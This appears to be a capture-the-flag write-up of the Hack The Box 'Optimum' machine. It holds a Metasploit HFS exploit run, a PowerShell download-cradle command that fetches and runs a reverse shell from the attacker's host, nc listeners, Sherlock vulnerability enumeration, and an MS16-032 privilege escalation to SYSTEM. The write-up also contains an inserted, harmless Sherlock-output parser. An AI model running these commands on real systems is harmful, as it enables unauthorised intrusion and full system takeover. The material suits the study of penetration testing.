
Optimum_HTB

Published 2023/12/31

Overview

  • Optimum is a beginner-level machine that focuses mainly on enumerating services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules.

SCAN

```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ nmap -T4 -Pn -sV -sC 10.10.10.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-29 06:01 EST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.89 seconds
```

Initial Access

  • Following the official write-up, first try it with msfconsole.
```bash
msf6 > search cve:2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
rhost => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ItO77Cfstcbu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ItO77Cfstcbu
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\uFrIskMYSOxH.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ikwLnccTo
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ikwLnccTo
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\DlvjNW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.8:49167) at 2023-12-28 23:31:32 -0500
[*] Server stopped.

meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
```
  • It worked on the second attempt.
    • The cause of the first failure is unknown.

Things stopped working after this point, so starting over.

Initial Access

Reverse shell using Invoke-PowerShellTcp.ps1

  1. Invoke-PowerShellTcp.ps1
  • Serve it with Python from the folder that contains it
    • python3 -m http.server 8080
  2. Listen with nc in another terminal
```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
```
  3. In yet another terminal, use 49125.py, which exploits the vulnerability
  • Confirmed the process is running as 32-bit, so the command accounts for 32-bit.
```bash
┌──(kali㉿kali)-[~/Optimum]
└─$ python3 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|C%3A%5CWINDOWS%5CSysnative%5CWindowsPowerShell%5Cv1.0%5Cpowershell.exe%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A//10.10.16.4%3A8080/Invoke-PowerShellTcp.ps1%27%29.}
```

Privilege Escalation

  1. Vulnerability check using Sherlock.ps1
  • Append this, since we want to check everything
    echo "Find-AllVulns" >> Sherlock.ps1
  • Serve it
    python3 -m http.server 8080
  2. Run
```powershell
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.2:8080/Sherlock.ps1')


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable



PS C:\Users\kostas\Desktop>
```
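To turn a Sherlock report like the one above into a patch-verification list, here is an added parser for its record format (example code, not part of the write-up or of Sherlock). The embedded excerpt is constructed from four of the records above; the expansion of shorthand CVE lists such as `2016-0093/94/95/96` into full CVE ids is an assumption about Sherlock's notation.

```python
# Constructed excerpt in Sherlock's Find-AllVulns output format (records copied from the report above).
SHERLOCK_OUTPUT = """
Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
"""


def parse_sherlock(text):
    """Split the report into records; each record is a dict of 'Key : value' lines."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():            # blank line ends a record
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(':')   # first ':' only, so URLs survive intact
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def expand_cves(field):
    """'2016-0093/94/95/96' -> CVE-2016-0093..0096; '2010-3338, 2010-3888' -> two ids (assumed notation)."""
    cves = []
    for item in field.split(','):
        parts = item.strip().split('/')
        year, num = parts[0].split('-')
        cves.append(f'CVE-{year}-{num}')
        for suffix in parts[1:]:        # shorthand shares the leading digits of the first number
            cves.append(f'CVE-{year}-{num[:-len(suffix)]}{suffix}')
    return cves


def triage(text):
    """Return the bulletins Sherlock flags as 'Appears Vulnerable', with their CVE ids, for patch checking."""
    return [{'bulletin': r['MSBulletin'], 'title': r['Title'], 'cves': expand_cves(r['CVEID'])}
            for r in parse_sherlock(text) if r.get('VulnStatus') == 'Appears Vulnerable']
```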

Invoke-MS16032.ps1

  • Use Invoke-MS16032.ps1 to obtain SYSTEM privileges.
```bash
# Serve from the directory that contains Invoke-MS16032.ps1
┌──(kali㉿kali)-[~/Optimum/oscp_notes/MS16-032 drivers eop]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/)
# Edit Invoke-PowerShellTcp.ps1 to use a port different from the existing reverse shell's, then serve it
┌──(kali㉿kali)-[~/Optimum/nishang/Shells]
└─$ python3 -m http.server 3434
Serving HTTP on 0.0.0.0 port 3434 (http://0.0.0.0:3434/) ...
```
```powershell
# In the terminal that already has the reverse shell
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-MS16032.ps1')
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!
```
## Listening reverse shell
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.8] 49183
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system
```

Recap of the flow
